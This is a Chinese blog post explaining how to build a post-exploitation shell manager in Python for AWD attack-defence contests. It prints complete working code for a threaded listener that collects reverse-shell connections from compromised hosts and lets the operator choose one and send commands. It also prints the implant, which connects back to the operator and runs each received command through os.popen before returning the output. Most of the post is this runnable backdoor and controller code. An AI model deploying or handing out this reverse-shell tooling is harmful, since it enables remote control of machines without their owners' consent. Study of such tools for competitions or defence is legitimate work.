美文网首页网络安全实验室Web安全程序员
python中的后渗透|也可用于AWD攻防--shell管理

python中的后渗透|也可用于AWD攻防--shell管理

作者: RedTeamWing | 来源:发表于2018-01-03 18:23 被阅读84次

    在所有的旋律中,wing对说散就散最专一!


    wing

    0x00 前言

    在平时或者线下AWD的时候,有一个shell管理器可以让我们打到事半功倍的效果。
    前提你要能获得别人shell,不然这个也没什么用了。
    我这里写好的这个只是一个思路,真正的后渗透工具,远比这个强大。

    0x01 具体思路

    • 先看有哪些主机和自己已经连接了
    • 加一个多线程管理
    • 然后就是给连接的主机编号,哪个主机是哪个ip
    • 选择相应的主机编号,进入对方shell
    • 加一个重新选择shell的功能
    • 命令执行时间上的判断,有些命令会出错或者没回显,就会卡死。

    实现流程

    [图片上传失败...(image-80d3db-1514974826506)]

    控制端
    主要是三个模块:

    import socket
    import threading
    import time
    
    def shell(sock, addr):
        while True:
            command = input(str(addr[0])+':wing#')
            if str(command) == 'c':
                select_shell()
                return
            if command == 'quit':
                quitTheard = True
                print(seeyou)
                exit(0)
            if command == 0:
                continue
            sock.send(command.encode('utf-8'))
            print('你发送的命令是:', command)
            data = sock.recv(1024)
            if not data:
                select_shell()
            print('命令执行成功,回显:',data.decode())
    
    

    获得sock和地址,判断是哪个机器和我们连接的。
    以及发送命令出去。进行编码解码。这里有一个坑。
    py2和py3的socket我感觉好像不一样,编码自己出现了问题买就去百度解决吧,我这里没啥问题,在我的机器调试好了。
    还有就是命令行选项,可以发挥你们的想象自行添加。

    
    def select_shell():
        global shellList
        global myhost
        print('------------------------------*------------------------------')
        print('控制端正在运行中!')
        print('------------------------------*------------------------------')
    
        for i in range(len(shellList)):
            print('shell 列表:')
            print('[%i]->%s' % (i,str(shellList[i][1][0])))
        print('请选择一个Shell ID!')
    
        while True:
            num = input('请输入Shell id:')
    
            if int(num) >= len(shellList):
                print('error!')
                continue
            else:
                break
    
        myhost = shellList[int(num)]
        print('*' * 66)
        print(' '* 22 + '已连接到' + myhost[1][0])
        print('*' * 66)
    
    
    

    得到的shell列表,将其list出来,按照id和ip分开:
    如图:


    wing
    def connecting(socks):
        while not threadQuit:
            if len(shellList) == 0:
                print('正在等待连接中,请稍后!')
            sock, addr = socks.accept()
            print('Bingo!连接已经和%s建立!' % addr[0])
            lock = threading.Lock()
            lock.acquire()
            shellList.append((sock, addr))
            lock.release()
    

    建立一个简单的线程,因为shellList好几个函数需要用到,就设置为全局变量。

    
    def main():
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.bind(('0.0.0.0',55555))
        s.listen()
    
        t = threading.Thread(target=connecting,args=(s,))
        t.start()
        time.sleep(1)
    
        while True:
            if len(shellList) > 0:
                select_shell()
                shell(myhost[0],myhost[1])
    
    
    if __name__ == '__main__':
        print(wingLogo)
        main()
    

    最后的主函数。建立scoket套接字,加入线程。
    讲一下socket对象中两个参数的含义,
    socket.AF_INET代表使用IPv4协议,socket.SOCK_STREAM
    代表使用面向流的Tcp协议,
    也就是说我们创建了一个基于IPv4协议的Tcp Server。
    当有多个台机器连接到控制端时,我们要记录这些机器的socket对象
    ,以便我们可以选择不同的操作对象
    服务端

    服务端主要就是接受命令并执行发送给控制端。
    python调用系统命令有这几种方法,更多的欢迎补充

    • os.popen().read()
    • os.sysytem
    • subproess
    • command模块
    subprocess.Popen()函数:
    这里我简单介绍一下。subprocess.Popen()可以实现在一个新的进程中启动一个子程序,
    第一个参数就是子程序的名字,shell=True则是说明程序在Shell中执行。至于stdout、stderr、
    stdin的值都是subprocess.PIPE,
    它是表示用管道的形式与子进程交互。
    还有一个就是一开始我说的比较坑的地方,就是编码,控制端发送命令执行结果的
    时候,如果用这个模块,建议先将结果用本地系统编码的方式进行解码,
    然后又用utf-8进行编码,以避免被控端编码不是utf-8时,控制端接收到的结果显示乱码
    
    os.system()
    这个函数不会返回值,没啥用
    
    os.popen()
    这个方法执行命令并返回执行后的信息对象,是通过一个管道文件将结果返回。
    >>> output = os.popen('cat /proc/cpuinfo') 
    >>> output 
    <open file 'cat /proc/cpuinfo', mode 'r' at 0x7ff52d831540> 
    >>> print output.read() 
    processor : 0
    vendor_id : AuthenticAMD 
    cpu family : 21
    ... ... 
    >>><span style="font-size:14px;">
    所以要加read
    
    commands模块
    >>> import commands 
    >>> (status, output) = commands.getstatusoutput('cat /proc/cpuinfo') 
    >>> print output 
    processor : 0
    vendor_id : AuthenticAMD 
    cpu family : 21
    ... ... 
    >>> print status 
    0
    

    一开始我是用subprocess,但是有些命令很慢,os.popen简便些。

    code:

    #!/usr/bin/env python3
    # _*_ coding: utf-8 _*_
    
    
    import socket
    import threading
    import subprocess
    import time
    import sys
    import argparse
    import os
    
    wingLogo = '''
                                 | |
     ___  ___ _ ____   _____ _ __| |
    / __|/ _ \ '__\ \ / / _ \ '__| |
    \__ \  __/ |   \ V /  __/ |  |_|
    |___/\___|_|    \_/ \___|_|  (_)
    '''
    
    def connect(host,port):
        sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sock.connect((host,int(port)))
        while True:
            print('等待控制端发送命令中......')
            cmd = sock.recv(1024)
            cmd = str(cmd.decode())
            print('正在执行命令-----', cmd)
            # shellCommand = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            # shell_out,shell_error = shellCommand.communicate()
            # cmd = shell_out.decode().encode('utf-8')
            # print(cmd)
            cmd = os.popen(cmd).read()
            print(cmd.encode('utf-8'))
            # cmd = os.popen(cmd)
            # print(cmd.encode('utf-8'))
            sock.sendall(bytes(cmd.encode('utf-8')))
            time.sleep(1)
    
    
    def main():
        parse = argparse.ArgumentParser()
        parse.add_argument('-H',dest='host',help='hostname')
        parse.add_argument('-p',dest='port',help='portname')
        args = parse.parse_args()
    
        host = args.host
        port = args.port
    
        if host == None and port ==None:
            print(parse.parse_args(['-h']))
            exit(-1)
        connect(host,port)
    
    
    if __name__ == '__main__':
        print(wingLogo)
        main()
    
    

    argparse模块也很好用,智能化一点。

    效果

    wing
    wing
    wing
    wing

    [图片上传失败...(image-f524d5-1514974826506)]


    wing
    wing
    wing

    GAME OVER!

    wing
    wing‘s blog

    相关文章

      网友评论

      • 尽情的嘲笑我吧:博主好赞👍, 那个ASCII码是怎么画出来的呢?求告知网址。:grin:
        RedTeamWing:@菩提树下的煮茶小童子 期待下次我叫你们怎么用,哈哈哈

      本文标题:python中的后渗透|也可用于AWD攻防--shell管理

      本文链接:https://www.haomeiwen.com/subject/lshknxtx.html